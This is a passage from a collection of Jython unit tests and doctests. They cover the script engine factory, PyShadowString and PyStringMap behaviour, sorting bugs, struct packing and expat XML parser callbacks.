if __name__ == '__main__':
test_main()
```
#### File: Lib/test/test_jsr223.py
```python
import unittest
import sys
from test import test_support
from javax.script import ScriptEngine, ScriptEngineManager
class JSR223TestCase(unittest.TestCase):
def test_factory(self):
engine = ScriptEngineManager().getEngineByName("python")
f = engine.factory
language_version = ".".join(str(comp) for comp in sys.version_info[0:2]) # such as "2.5"
impl_version = ".".join(str(comp) for comp in sys.version_info[0:3]) # such as "2.5.2"
self.assertNotEqual(f.scriptEngine, engine) # we don't pool engines
self.assertEqual(f.engineName, "jython")
self.assertEqual(f.engineVersion, impl_version)
self.assertEqual(set(f.extensions), set(['py']))
self.assertEqual(f.languageName, "python")
self.assertEqual(f.languageVersion, language_version)
self.assertEqual(set(f.names), set(["python", "jython"]))
self.assertEqual(set(f.mimeTypes), set(["text/python", "application/python", "text/x-python", "application/x-python"]))
# variants
self.assertEqual(f.getParameter(ScriptEngine.ENGINE), "jython")
self.assertEqual(f.getParameter(ScriptEngine.ENGINE_VERSION), impl_version)
self.assertEqual(f.getParameter(ScriptEngine.NAME), "jython")
self.assertEqual(f.getParameter(ScriptEngine.LANGUAGE), "python")
self.assertEqual(f.getParameter(ScriptEngine.LANGUAGE_VERSION), language_version)
self.assertEqual(f.getOutputStatement("abc"), "print u'abc'")
self.assertEqual(f.getProgram("x = 42", "y = 'abc'"), "x = 42\ny = 'abc'\n")
def test_main():
test_support.run_unittest(
JSR223TestCase)
if __name__ == "__main__":
test_main()
```
#### File: Lib/test/test_jython_initializer.py
```python
import os
import subprocess
import sys
import unittest
from test import test_support
WINDOWS = (os._name if test_support.is_jython else os.name) == 'nt'
class TestUsingInitializer(unittest.TestCase):
def test_syspath_initializer(self):
fn = test_support.findfile('check_for_initializer_in_syspath.py')
jar = test_support.findfile('syspath_initializer.jar')
env = dict(CLASSPATH=jar,
JAVA_HOME=sys.registry['java.home'],
PATH=os.environ.get('PATH', ''))
if WINDOWS:
# TMP is needed to give property java.io.tmpdir a sensible value
env['TMP'] = os.environ.get('TMP', '.')
# SystemRoot is needed to remote debug the subprocess JVM
env['SystemRoot'] = os.environ.get('SystemRoot', '')
self.assertEquals(0, subprocess.call([sys.executable, fn], env=env))
def test_main():
test_support.run_unittest(TestUsingInitializer)
if __name__ == "__main__":
test_main()
```
#### File: Lib/test/test_metaclass.py
```python
import unittest
from test import test_support
class MetaclassModuleTestCase(unittest.TestCase):
def test_module_attribute(self):
#Test for SF bug #1781500: wrong __module__ for classes with a metaclass
from test_metaclass_support.simpleclass import TestClass
self.assert_(TestClass.__module__.endswith('simpleclass'))
def test_main():
test_support.run_unittest(MetaclassModuleTestCase)
if __name__ == '__main__':
test_main()
```
#### File: Lib/test/test_pep263_jy.py
```python
import unittest
from test import test_support
class BadEncodingTest(unittest.TestCase):
def test_invalid_default(self):
self.assertRaises(SyntaxError, __import__, "test.latin1_no_encoding")
def test_invalid_declared_encoding(self):
self.assertRaises(SyntaxError, __import__, "test.invalid_utf_8_declared_encoding")
def test_main():
test_support.run_unittest(BadEncodingTest)
if __name__=="__main__":
test_main()
```
#### File: Lib/test/test_pulldom.py
```python
import StringIO
import unittest
from xml.dom import pulldom
from test import test_support
class UnicodeTests(unittest.TestCase):
testDoc = """\
<?xml version="1.0" encoding="ascii"?>
<document>
<p>Some greek: ΑΒΓΔΕ</p>
<greek attrs="ΖΗΘΙΚ"/>
<?greek ΛΜΝΞΟ?>
<!--ΛΜΝΞΟ-->
</document>
"""
def setUp(self):
self.testFile = StringIO.StringIO(self.testDoc)
def testTextNodes(self):
text = []
for event, node in pulldom.parse(self.testFile):
if event == pulldom.CHARACTERS:
text.append(node.data)
try:
result = u"".join(text)
self.failUnlessEqual(repr(result), r"u'\n Some greek: \u0391\u0392\u0393\u0394\u0395\n \n \n \n'")
except Exception, x:
self.fail("Unexpected exception joining text pieces: %s" % str(x))
def testAttributes(self):
attrText = []
for event, node in pulldom.parse(self.testFile):
if event == pulldom.START_ELEMENT:
for attrIx in range(node.attributes.length):
attrText.append(node.attributes.item(attrIx).value)
try:
result = u"".join(attrText)
self.failUnlessEqual(repr(result), r"u'\u0396\u0397\u0398\u0399\u039a'")
except Exception, x:
self.fail("Unexpected exception joining attribute text pieces: %s" % str(x))
def testProcessingInstruction(self):
piText = []
for event, node in pulldom.parse(self.testFile):
if event == pulldom.PROCESSING_INSTRUCTION:
piText.append(node.data)
try:
result = u"".join(piText)
# Weird how the repr for PI data is different from text and char data.
# Still, the whole xml.dom.* and xml.sax.* hierarchy is rather a
# labyrinthine mess under jython, mostly because it's so old, and
# yet survived through major evolutionary changes in both jython and java.
self.failUnlessEqual(repr(result), r"u'ΛΜΝΞΟ'")
except Exception, x:
self.fail("Unexpected exception joining pi data pieces: %s" % str(x))
def testComment(self):
commentText = []
for event, node in pulldom.parse(self.testFile):
if event == pulldom.COMMENT:
commentText.append(node.data)
try:
result = u"".join(commentText)
self.failUnlessEqual(repr(result), r"u'ΛΜΝΞΟ'")
except Exception, x:
self.fail("Unexpected exception joining comment data pieces: %s" % str(x))
def test_main():
test_support.run_unittest(__name__)
if __name__ == "__main__":
test_main()
```
#### File: Lib/test/test_shadowstr_jy.py
```python
import os
import sys
from test import string_tests
from test.test_support import run_unittest, is_jython
from test.test_str import StrTest
import unittest
from org.python.core import PyShadowString
# Ideally we would test shadowstr is a str but the tests need to sub-class it
class StrTestCase(
string_tests.CommonTest,
string_tests.MixinStrUnicodeUserStringTest,
string_tests.MixinStrUserStringTest,
):
# A PyShadowString should pass the tests for str too.
type2test = PyShadowString
class ShadowStrTestCase(unittest.TestCase):
def setUp(self):
self.ss = PyShadowString("hello", "bonjour")
# The Java class of a python module may be <module>$py
CCLASS = r"test\.test_shadowstr_jy\$py" # compiled (e.g. regrtest)
# Or it may be org.python.pycode._pyx<n>
PCLASS = r"org\.python\.pycode\._pyx\d+" # .py at the prompt
def check_first_eq(self):
self.assertTrue(self.ss == "hello")
self.assertFalse(self.ss == "bonjour")
self.assertTrue("hello" == self.ss)
self.assertFalse("bonjour" == self.ss)
# shadowstring-shadowstring comparisons
tt = PyShadowString("hello", "goodbye")
self.assertTrue(self.ss == tt) # primary==primary
tt = PyShadowString("adieu", "hello")
self.assertFalse(self.ss == tt) # primary==shadow
self.assertFalse(tt == self.ss) # shadow==primary
tt = PyShadowString("adieu", "bonjour")
self.assertFalse(self.ss == tt) # shadow==shadow
def check_both_eq(self):
self.assertTrue(self.ss == "hello")
self.assertTrue(self.ss == "bonjour")
self.assertTrue("hello" == self.ss)
self.assertTrue("bonjour" == self.ss)
# shadowstring-shadowstring comparisons
tt = PyShadowString("hello", "goodbye")
for c, m in self.ss.gettargets(): tt.addtarget(c, m)
self.assertTrue(self.ss == tt) # primary==primary
tt = PyShadowString("goodbye", "hello")
for c, m in self.ss.gettargets(): tt.addtarget(c, m)
self.assertTrue(self.ss == tt) # primary==shadow
self.assertTrue(tt == self.ss) # shadow==primary
tt = PyShadowString("adieu", "bonjour")
for c, m in self.ss.gettargets(): tt.addtarget(c, m)
self.assertTrue(self.ss == tt) # shadow==shadow
def test_eq(self):
# Test recognition unconditionally
self.check_first_eq()
self.ss.addtarget(None) # match any
self.check_both_eq()
def test_eq_class(self):
# Test recognition of class context only
self.check_first_eq()
self.ss.addtarget(self.CCLASS)
self.ss.addtarget(self.PCLASS)
self.check_both_eq()
def test_eq_method(self):
# Test recognition of method context only
self.check_first_eq()
# The Java method name of a python function is name$<n>
self.ss.addtarget(None, r"test_eq_method\$\d+") # method only
self.check_both_eq()
def test_eq_class_method(self):
# Test recognition of class and method context
self.check_first_eq()
# Match this method in this module
method = r"test_eq_class_method\$\d+"
self.ss.addtarget(self.CCLASS, method)
self.ss.addtarget(self.PCLASS, method)
self.check_both_eq()
def check_first_startswith(self):
self.assertTrue(self.ss.startswith("hel"))
self.assertFalse(self.ss.startswith("bon"))
def check_both_startswith(self):
self.assertTrue(self.ss.startswith("hel"))
self.assertTrue(self.ss.startswith("bon"))
def test_startswith(self):
# Test recognition unconditionally
self.check_first_startswith()
self.ss.addtarget(None) # match any
self.check_both_startswith()
def test_startswith_class(self):
# Test recognition of class context only
self.check_first_startswith()
self.ss.addtarget(self.CCLASS) # class only
self.ss.addtarget(self.PCLASS) # class only
self.check_both_startswith()
def test_startswith_method(self):
# Test recognition of method context only
self.check_first_startswith()
self.ss.addtarget(None, r"test_startswith_method\$\d+") # method only
self.check_both_startswith()
def test_startswith_class_method(self):
# Test recognition of class and method context
self.check_first_startswith()
# Match this method in this module
method = r"test_startswith_class_method\$\d+"
self.ss.addtarget(self.CCLASS, method)
self.ss.addtarget(self.PCLASS, method)
self.check_both_startswith()
def test_slice(self):
# Test slicing goes through to the constituent strings consistently
def check(m, n):
tt = self.ss[m:n]
self.assertEqual(tt, "hello"[m:n])
self.assertEqual(tt, "bonjour"[m:n])
self.assertEqual(self.ss.gettargets(), tt.gettargets())
# Match this method in this module
method = r"test_slice\$\d+"
self.ss.addtarget(self.CCLASS, method)
self.ss.addtarget(self.PCLASS, method)
check(None, 3)
check(1, 5)
check(-3, None)
check(None, None)
def test_main():
run_unittest(
StrTestCase,
ShadowStrTestCase,
)
if __name__ == "__main__":
test_main()
```
#### File: Lib/test/test_sort_jy.py
```python
from test import test_support
import unittest
class SortTest(unittest.TestCase):
def test_bug1835099(self):
a = [21469, 0, 25093, 21992, 26488, 21392, 21998, 22387, 30011, 18382, 23114, 24329, 29505, 24637, 22922, 24258, 19705, 17497, 16693, 20602, 24780, 14618, 18200, 18468, 24491, 20448, 16797, 25276, 27262, 134009, 132609, 135000, 133027, 133957, 134209, 136300, 135505, 137629, 137364, 136698, 136705, 135020, 138258, 136820, 136502, 140408, 140861, 152317, 150993, 144857, 137562, 138705, 138811, 137456, 138393, 138521, 140876, 140271, 141384, 139595, 141839, 141237, 140742, 140514, 141127, 141411, 141501]
a_set = set(a)
a_sorted = sorted(a)
a_sorted_set = set(a_sorted)
if a_sorted_set != a_set:
print 'list elements changed during sort:'
print 'removed', tuple(a_set - a_sorted_set)
print 'added', tuple(a_sorted_set - a_set)
assert len(a_set - a_sorted_set) == len(a_sorted_set - a_set) == 0
def test_bug1767(self):
'Test bug 1767 sorting when __cmp__ inconsistent with __eq__'
class Tricky:
def __init__(self, pair):
self.key0, self.key1 = pair
def __cmp__(self, other):
# Duplicates standard sort for pairs
if self.key0 != other.key0:
return cmp(self.key0, other.key0)
return cmp(self.key1, other.key1)
def __eq__(self,other):
# Compare only on second key: inconsistent with __cmp__()==0
return self.key1 == other.key1
def __repr__(self):
return "(%d, %d)" %(self.key0, self.key1)
def slowSorted(qq) :
'Reference sort peformed by insertion using only <'
rr = list()
for q in qq :
i = 0
for i in range(len(rr)) :
if q < rr[i] :
rr.insert(i,q)
break
else :
rr.append(q)
return rr
def check(trick, answer):
'Check list of Tricky matches list of pairs in order'
assert len(trick)==len(answer)
for t, a in zip(trick,answer) :
# print q, a
assert t.key0==a[0] and t.key1==a[1]
# Test material
question = [(2, 5), (1, 3), (3, 0), (2, 3), (1, 1), (2, 3),
(3, 5), (1, 0), (2, 0), (2, 1), (1, 4), (2, 5),
(1, 1), (3, 5), (2, 5), (1, 0), (3, 2), (1, 1),
(2, 2), (2, 2), (1, 0), (2, 3), (2, 1), (3, 2)]
answer = slowSorted(question)
# Test library function
que = [Tricky(p) for p in question]
que.sort()
check(que, answer)
# Test library function in reverse
que = [Tricky(p) for p in question]
que.sort(reverse=True)
check(que, list(reversed(answer)))
def test_main():
test_support.run_unittest(SortTest)
if __name__ == "__main__":
test_main()
```
#### File: Lib/test/test_stringmap.py
```python
import unittest
from test import test_support
from test_userdict import TestMappingProtocol
from org.python.core import PyStringMap
class SimpleClass:
pass
class StringMapTest(TestMappingProtocol):
_tested_class = None
class ClassDictTests(StringMapTest):
"""Check that class dicts conform to the mapping protocol"""
def _empty_mapping(self):
for key in SimpleClass.__dict__.copy():
SimpleClass.__dict__.pop(key)
return SimpleClass.__dict__
class InstanceDictTests(StringMapTest):
def _empty_mapping(self):
return SimpleClass().__dict__
class PyStringMapTest(StringMapTest):
_tested_class = PyStringMap
def test_all(self):
d = PyStringMap()
# Test __setitem__
d["one"] = 1
# Test __getitem__
self.assertEqual(d["one"], 1)
self.assertRaises(KeyError, d.__getitem__, "two")
# Test __delitem__
del d["one"]
self.assertRaises(KeyError, d.__delitem__, "one")
# Test clear
d.update(self._reference())
d.clear()
self.assertEqual(d, {})
# Test copy()
d.update(self._reference())
da = d.copy()
self.assertEqual(d, da)
# Test keys, items, values
r = self._reference()
d.update(self._reference())
for k in d.keys():
self.failUnless(k in r.keys())
for i in d.items():
self.failUnless(i in r.items())
for v in d.values():
self.failUnless(v in r.values())
# Test has_key and "in".
for i in r.keys():
self.assert_(d.has_key(i))
self.assert_(i in d)
# Test unhashability
self.assertRaises(TypeError, hash, d)
def test_stringmap_in_mapping(self):
class A:
def __init__(self):
self.a = "a"
self.assertEquals("a", "%(a)s" % A().__dict__)
def test_main():
test_support.run_unittest(
ClassDictTests,
InstanceDictTests,
PyStringMapTest
)
if __name__ == "__main__":
test_main()
```
#### File: Lib/test/test_struct_jy.py
```python
import unittest
from test import test_support
import struct
import sys
ISBIGENDIAN = sys.byteorder == "big"
class StructTests(unittest.TestCase): # (format, argument, big-endian result, little-endian result, asymmetric)
_tests = [
('c', 'a', 'a', 'a', 0),
('xc', 'a', '\0a', '\0a', 0),
('cx', 'a', 'a\0', 'a\0', 0),
('s', 'a', 'a', 'a', 0),
('0s', 'helloworld', '', '', 1),
('1s', 'helloworld', 'h', 'h', 1),
('9s', 'helloworld', 'helloworl', 'helloworl', 1),
('10s', 'helloworld', 'helloworld', 'helloworld', 0),
('11s', 'helloworld', 'helloworld\0', 'helloworld\0', 1),
('20s', 'helloworld', 'helloworld'+10*'\0', 'helloworld'+10*'\0', 1),
('b', 7, '\7', '\7', 0),
('b', -7, '\371', '\371', 0),
('B', 7, '\7', '\7', 0),
('B', 249, '\371', '\371', 0),
('h', 700, '\002\274', '\274\002', 0),
('h', -700, '\375D', 'D\375', 0),
('H', 700, '\002\274', '\274\002', 0),
('H', 0x10000-700, '\375D', 'D\375', 0),
('i', 70000000, '\004,\035\200', '\200\035,\004', 0),
('i', -70000000, '\373\323\342\200', '\200\342\323\373', 0),
('I', 70000000L, '\004,\035\200', '\200\035,\004', 0),
('I', 0x100000000L-70000000, '\373\323\342\200', '\200\342\323\373', 0),
('l', 70000000, '\004,\035\200', '\200\035,\004', 0),
('l', -70000000, '\373\323\342\200', '\200\342\323\373', 0),
('L', 70000000L, '\004,\035\200', '\200\035,\004', 0),
('L', 0x100000000L-70000000, '\373\323\342\200', '\200\342\323\373', 0),
('f', 2.0, '@\000\000\000', '\000\000\000@', 0),
('d', 2.0, '@\000\000\000\000\000\000\000',
'\000\000\000\000\000\000\000@', 0),
('f', -2.0, '\300\000\000\000', '\000\000\000\300', 0),
('d', -2.0, '\300\000\000\000\000\000\000\000',
'\000\000\000\000\000\000\000\300', 0),
]
def test_struct(self):
for fmt, arg, big, lil, asy in self._tests:
for (xfmt, exp) in [('>'+fmt, big), ('!'+fmt, big), ('<'+fmt, lil),
('='+fmt, ISBIGENDIAN and big or lil)]:
res = struct.pack(xfmt, arg)
self.assertEqual(res,exp,msg="pack(%r, %r) -> %r # expected %r" %
(fmt, arg, res, exp))
n=struct.calcsize(xfmt)
self.assertEqual(n, len(res),msg="calcsize(%r) -> %d # expected %d" %
(xfmt, n, len(res)))
rev = struct.unpack(xfmt, res)[0]
if asy:
self.assertNotEqual(arg,rev,msg="unpack(%r, %r) -> (%r,) # expected (%r,)" %
(fmt, res, rev, exp))
else:
self.assertEqual(arg,rev,msg="unpack(%r, %r) -> (%r,) # expected (%r,)" %
(fmt, res, rev, arg))
def test_struct_unpack_bytearray(self):
for fmt, arg, big, lil, asy in self._tests:
for (xfmt, exp) in [('>'+fmt, big), ('!'+fmt, big), ('<'+fmt, lil),
('='+fmt, ISBIGENDIAN and big or lil)]:
res = struct.pack(xfmt, arg)
self.assertEqual(res,exp,msg="pack(%r, %r) -> %r # expected %r" %
(fmt, arg, res, exp))
n=struct.calcsize(xfmt)
self.assertEqual(n, len(res),msg="calcsize(%r) -> %d # expected %d" %
(xfmt, n, len(res)))
rev = struct.unpack(xfmt, bytearray(res))[0]
if asy:
self.assertNotEqual(arg,rev,msg="unpack(%r, %r) -> (%r,) # expected (%r,)" %
(fmt, res, rev, exp))
else:
self.assertEqual(arg,rev,msg="unpack(%r, %r) -> (%r,) # expected (%r,)" %
(fmt, res, rev, arg))
def test_struct_unpack_buffer(self):
for fmt, arg, big, lil, asy in self._tests:
for (xfmt, exp) in [('>'+fmt, big), ('!'+fmt, big), ('<'+fmt, lil),
('='+fmt, ISBIGENDIAN and big or lil)]:
res = struct.pack(xfmt, arg)
self.assertEqual(res,exp,msg="pack(%r, %r) -> %r # expected %r" %
(fmt, arg, res, exp))
n=struct.calcsize(xfmt)
self.assertEqual(n, len(res),msg="calcsize(%r) -> %d # expected %d" %
(xfmt, n, len(res)))
rev = struct.unpack(xfmt, buffer(res))[0]
if asy:
self.assertNotEqual(arg,rev,msg="unpack(%r, %r) -> (%r,) # expected (%r,)" %
(fmt, res, rev, exp))
else:
self.assertEqual(arg,rev,msg="unpack(%r, %r) -> (%r,) # expected (%r,)" %
(fmt, res, rev, arg))
def test_struct_unpack_from(self):
for fmt, arg, big, lil, asy in self._tests:
for (xfmt, exp) in [('>'+fmt, big), ('!'+fmt, big), ('<'+fmt, lil),
('='+fmt, ISBIGENDIAN and big or lil)]:
res = struct.pack(xfmt, arg)
self.assertEqual(res,exp,msg="pack(%r, %r) -> %r # expected %r" %
(fmt, arg, res, exp))
n=struct.calcsize(xfmt)
self.assertEqual(n, len(res),msg="calcsize(%r) -> %d # expected %d" %
(xfmt, n, len(res)))
rev = struct.unpack_from(xfmt, res)[0]
if asy:
self.assertNotEqual(arg,rev,msg="unpack(%r, %r) -> (%r,) # expected (%r,)" %
(fmt, res, rev, exp))
else:
self.assertEqual(arg,rev,msg="unpack(%r, %r) -> (%r,) # expected (%r,)" %
(fmt, res, rev, arg))
def test_struct_unpack_from_bytearray(self):
for fmt, arg, big, lil, asy in self._tests:
for (xfmt, exp) in [('>'+fmt, big), ('!'+fmt, big), ('<'+fmt, lil),
('='+fmt, ISBIGENDIAN and big or lil)]:
res = struct.pack(xfmt, arg)
self.assertEqual(res,exp,msg="pack(%r, %r) -> %r # expected %r" %
(fmt, arg, res, exp))
n=struct.calcsize(xfmt)
self.assertEqual(n, len(res),msg="calcsize(%r) -> %d # expected %d" %
(xfmt, n, len(res)))
rev = struct.unpack_from(xfmt, bytearray(res))[0]
if asy:
self.assertNotEqual(arg,rev,msg="unpack(%r, %r) -> (%r,) # expected (%r,)" %
(fmt, res, rev, exp))
else:
self.assertEqual(arg,rev,msg="unpack(%r, %r) -> (%r,) # expected (%r,)" %
(fmt, res, rev, arg))
def test_struct_unpack_from_buffer(self):
for fmt, arg, big, lil, asy in self._tests:
for (xfmt, exp) in [('>'+fmt, big), ('!'+fmt, big), ('<'+fmt, lil),
('='+fmt, ISBIGENDIAN and big or lil)]:
res = struct.pack(xfmt, arg)
self.assertEqual(res,exp,msg="pack(%r, %r) -> %r # expected %r" %
(fmt, arg, res, exp))
n=struct.calcsize(xfmt)
self.assertEqual(n, len(res),msg="calcsize(%r) -> %d # expected %d" %
(xfmt, n, len(res)))
rev = struct.unpack_from(xfmt, buffer(res))[0]
if asy:
self.assertNotEqual(arg,rev,msg="unpack(%r, %r) -> (%r,) # expected (%r,)" %
(fmt, res, rev, exp))
else:
self.assertEqual(arg,rev,msg="unpack(%r, %r) -> (%r,) # expected (%r,)" %
(fmt, res, rev, arg))
def test_main():
test_support.run_unittest(__name__)
if __name__ == "__main__":
test_main()
```
#### File: Lib/test/test_xml_etree_jy.py
```python
import sys
JYTHON = sys.platform.startswith("java")
import doctest
from test import test_support
import xml.parsers.expat as expat
from xml.etree.ElementTree import *
def jython(function):
if JYTHON:
return function
else:
return None
class sortdict(dict):
def __repr__(self):
items = self.items()
items.sort()
pairs = ["%r: %r" % pair for pair in items]
return "{%s}" % ", ".join(pairs)
__str__ = __repr__
class Outputter:
def StartElementHandler(self, name, attrs):
print 'Start element:\n ', repr(name), sortdict(attrs)
def EndElementHandler(self, name):
print 'End element:\n ', repr(name)
def CharacterDataHandler(self, data):
data = data.strip()
if data:
print 'Character data:'
print ' ', repr(data)
def ProcessingInstructionHandler(self, target, data):
print 'PI:\n ', repr(target), repr(data)
def StartNamespaceDeclHandler(self, prefix, uri):
print 'NS decl:\n ', repr(prefix), repr(uri)
def EndNamespaceDeclHandler(self, prefix):
print 'End of NS decl:\n ', repr(prefix)
def StartCdataSectionHandler(self):
print 'Start of CDATA section'
def EndCdataSectionHandler(self):
print 'End of CDATA section'
def CommentHandler(self, text):
print 'Comment:\n ', repr(text)
def NotationDeclHandler(self, *args):
name, base, sysid, pubid = args
print 'Notation declared:', args
def UnparsedEntityDeclHandler(self, *args):
entityName, base, systemId, publicId, notationName = args
print 'Unparsed entity decl:\n ', args
def NotStandaloneHandler(self, userData):
print 'Not standalone'
return 1
def ExternalEntityRefHandler(self, *args):
context, base, sysId, pubId = args
print 'External entity ref:', args[1:]
return 1
def DefaultHandler(self, userData):
pass
def DefaultHandlerExpand(self, userData):
pass
_= """
>>> data = '''\
... <?xml version="1.0" encoding="iso-8859-1" standalone="no"?>
... <?xml-stylesheet href="stylesheet.css"?>
... <!-- comment data -->
... <!DOCTYPE quotations SYSTEM "quotations.dtd" [
... <!ELEMENT root ANY>
... <!NOTATION notation SYSTEM "notation.jpeg">
... <!ENTITY acirc "â">
... <!ENTITY external_entity SYSTEM "entity.file">
... <!ENTITY unparsed_entity SYSTEM "entity.file" NDATA notation>
... %unparsed_entity;
... ]>
...
... <root attr1="value1" attr2="value2ὀ">
... <myns:subelement xmlns:myns="http://www.python.org/namespace">
... Contents of subelements
... </myns:subelement>
... <sub2><![CDATA[contents of CDATA section]]></sub2>
... &external_entity;
... </root>
... '''
"""
def test_utf8():
"""
Source: test_pyexpat.py
Changes: replaced tabs with spaces in Outputter to ease doctest integration
>>> out = Outputter()
>>> parser = expat.ParserCreate(namespace_separator='!')
>>> HANDLER_NAMES = [
... 'StartElementHandler', 'EndElementHandler',
... 'CharacterDataHandler',
... 'ProcessingInstructionHandler',
... 'UnparsedEntityDeclHandler', 'NotationDeclHandler',
... 'StartNamespaceDeclHandler', 'EndNamespaceDeclHandler',
... 'CommentHandler', 'StartCdataSectionHandler',
... 'EndCdataSectionHandler',
... 'DefaultHandler', 'DefaultHandlerExpand',
... #'NotStandaloneHandler',
... 'ExternalEntityRefHandler'
... ]
>>> for name in HANDLER_NAMES:
... setattr(parser, name, getattr(out, name))
>>> data = '''\\
... <?xml version="1.0" encoding="iso-8859-1" standalone="no"?>
... <?xml-stylesheet href="stylesheet.css"?>
... <!-- comment data -->
... <!DOCTYPE quotations SYSTEM "quotations.dtd" [
... <!ELEMENT root ANY>
... <!NOTATION notation SYSTEM "notation.jpeg">
... <!ENTITY acirc "â">
... <!ENTITY external_entity SYSTEM "entity.file">
... <!ENTITY unparsed_entity SYSTEM "entity.file" NDATA notation>
... %unparsed_entity;
... ]>
...
... <root attr1="value1" attr2="value2ὀ">
... <myns:subelement xmlns:myns="http://www.python.org/namespace">
... Contents of subelements
... </myns:subelement>
... <sub2><![CDATA[contents of CDATA section]]></sub2>
... &external_entity;
... </root>
... '''
#Produce UTF-8 output
#>>> parser.returns_unicode = 0
#>>> try:
#... parser.Parse(data, 1)
#... except expat.error:
#... print '** Error', parser.ErrorCode, expat.ErrorString(parser.ErrorCode)
#... print '** Line', parser.ErrorLineNumber
#... print '** Column', parser.ErrorColumnNumber
#... print '** Byte', parser.ErrorByteIndex
#PI:
#'xml-stylesheet' 'href="stylesheet.css"'
#Comment:
#' comment data '
#Notation declared: ('notation', None, 'notation.jpeg', None)
#Unparsed entity decl:
#('unparsed_entity', None, 'entity.file', None, 'notation')
#Start element:
#'root' {'attr1': 'value1', 'attr2': 'value2\\xe1\\xbd\\x80'}
#NS decl:
#'myns' 'http://www.python.org/namespace'
#Start element:
#'http://www.python.org/namespace!subelement' {}
#Character data:
#'Contents of subelements'
#End element:
#'http://www.python.org/namespace!subelement'
#End of NS decl:
#'myns'
#Start element:
#'sub2' {}
#Start of CDATA section
#Character data:
#'contents of CDATA section'
#End of CDATA section
#End element:
#'sub2'
#External entity ref: (None, 'entity.file', None)
#End element:
#'root'
#1
>>> parser = expat.ParserCreate(namespace_separator='!')
>>> parser.returns_unicode = 1
>>> for name in HANDLER_NAMES:
... setattr(parser, name, getattr(out, name))
>>> try:
... parser.Parse(data, 1)
... except expat.error:
... print '** Line', parser.ErrorLineNumber
... print '** Column', parser.ErrorColumnNumber
... print '** Byte', parser.ErrorByteIndex #doctest: +REPORT_UDIFF
PI:
u'xml-stylesheet' u'href="stylesheet.css"'
Comment:
u' comment data '
Notation declared: (u'notation', None, u'notation.jpeg', None)
Unparsed entity decl:
(u'unparsed_entity', None, u'entity.file', None, u'notation')
Start element:
u'root' {u'attr1': u'value1', u'attr2': u'value2\u1f40'}
NS decl:
u'myns' u'http://www.python.org/namespace'
Start element:
u'http://www.python.org/namespace!subelement' {}
Character data:
u'Contents of subelements'
End element:
u'http://www.python.org/namespace!subelement'
End of NS decl:
u'myns'
Start element:
u'sub2' {}
Start of CDATA section
Character data:
u'contents of CDATA section'
End of CDATA section
End element:
u'sub2'
External entity ref: (None, u'entity.file', None)
End element:
u'root'
1
"""
def test_import_as_pyexpat():
"""
>>> import pyexpat as expat
>>> expat #doctest: +ELLIPSIS
<module 'pyexpat' from ...>
"""
def test_errors_submodule():
"""
>>> import xml.parsers.expat as expat
>>> expat.errors
<module 'pyexpat.errors' (built-in)>
>>> dir(expat.errors) #doctest: +ELLIPSIS
['XML_ERROR_ABORTED', ..., 'XML_ERROR_XML_DECL', '__doc__', '__name__']
>>> expat.errors.XML_ERROR_ABORTED
'parsing aborted'
>>> expat.errors.XML_ERROR_XML_DECL
'XML declaration not well-formed'
"""
def test_model_submodule():
"""
>>> import xml.parsers.expat as expat
>>> expat.model
<module 'pyexpat.model' (built-in)>
>>> print sortdict(expat.model.__dict__)
{'XML_CQUANT_NONE': 0, 'XML_CQUANT_OPT': 1, 'XML_CQUANT_PLUS': 3, 'XML_CQUANT_REP': 2, 'XML_CTYPE_ANY': 2, 'XML_CTYPE_CHOICE': 5, 'XML_CTYPE_EMPTY': 1, 'XML_CTYPE_MIXED': 3, 'XML_CTYPE_NAME': 4, 'XML_CTYPE_SEQ': 6, '__doc__': 'Constants used to interpret content model information.', '__name__': 'pyexpat.model'}
"""
def test_parse_only_xml_data():
"""
Source: test_pyexpat.py, see also: http://python.org/sf/1296433
Changes:
- replaced 'iso8859' encoding with 'ISO-8859-1',
- added isfinal=True keyword argument to Parse call (as in this port,
the data is not processed until it is fully available).
With these changes, the test still crashes CPython 2.5.
>>> import xml.parsers.expat as expat
>>> # xml = "<?xml version='1.0' encoding='iso8859'?><s>%s</s>" % ('a' * 1025)
This one doesn't crash:
>>> xml = "<?xml version='1.0'?><s>%s</s>" % ('a' * 10000)
>>> def handler(text):
... raise Exception
>>> parser = expat.ParserCreate()
>>> parser.CharacterDataHandler = handler
>>> try:
... parser.Parse(xml, True)
... except:
... pass
"""
def test_namespace_separator():
"""
Source: test_pyexpat.py
Tests that make sure we get errors when the namespace_separator value
is illegal, and that we don't for good values:
>>> from xml.parsers.expat import ParserCreate
>>> p = ParserCreate()
>>> p = ParserCreate(namespace_separator=None)
>>> p = ParserCreate(namespace_separator=' ')
>>> p = ParserCreate(namespace_separator=42) #doctest: +ELLIPSIS
Traceback (most recent call last):
...
TypeError: ...
>>> p = ParserCreate(namespace_separator='too long') #doctest: +ELLIPSIS
Traceback (most recent call last):
...
ValueError: ...
ParserCreate() needs to accept a namespace_separator of zero length
to satisfy the requirements of RDF applications that are required
to simply glue together the namespace URI and the localname. Though
considered a wart of the RDF specifications, it needs to be supported.
See XML-SIG mailing list thread starting with
http://mail.python.org/pipermail/xml-sig/2001-April/005202.html
>>> p = ParserCreate(namespace_separator='') # too short
"""
def test_interning_machinery():
"""
Source: test_pyexpat.py
>>> from xml.parsers.expat import ParserCreate
>>> p = ParserCreate()
>>> L = []
>>> def collector(name, *args):
... L.append(name)
>>> p.StartElementHandler = collector
>>> p.EndElementHandler = collector
>>> p.Parse("<e> <e/> <e></e> </e>", 1)
1
>>> tag = L[0]
>>> len(L)
6
>>> all(tag is entry for entry in L)
True
"""
def test_exception_from_callback():
"""
Source: test_pyexpat.py
>>> from xml.parsers.expat import ParserCreate
>>> def StartElementHandler(name, attrs):
... raise RuntimeError(name)
>>> parser = ParserCreate()
>>> parser.StartElementHandler = StartElementHandler
>>> try:
... parser.Parse("<a><b><c/></b></a>", 1)
... except RuntimeError, e:
... pass
>>> e.args[0] == "a"
True
"""
def test_with_and_without_namespace():
"""
>>> from xml.parsers.expat import ParserCreate
>>> xml = '''<root
... xmlns="http://www.python.org"
... xmlns:python="http://www.python.org"
... python:a="1" b="2">
... <python:sub1/>
... <sub2 xmlns=""/>
... </root>'''
>>> def handler(name, attributes):
... attributes = sorted(attributes.items())
... print name
... for attr in attributes:
... print " %s = %r" % attr
>>> parser = ParserCreate()
>>> parser.StartElementHandler = handler
>>> _ = parser.Parse(xml, True)
root
b = u'2'
python:a = u'1'
xmlns = u'http://www.python.org'
xmlns:python = u'http://www.python.org'
python:sub1
sub2
xmlns = u''
>>> parser = ParserCreate(namespace_separator="|")
>>> parser.StartElementHandler = handler
>>> _ = parser.Parse(xml, True)
http://www.python.org|root
b = u'2'
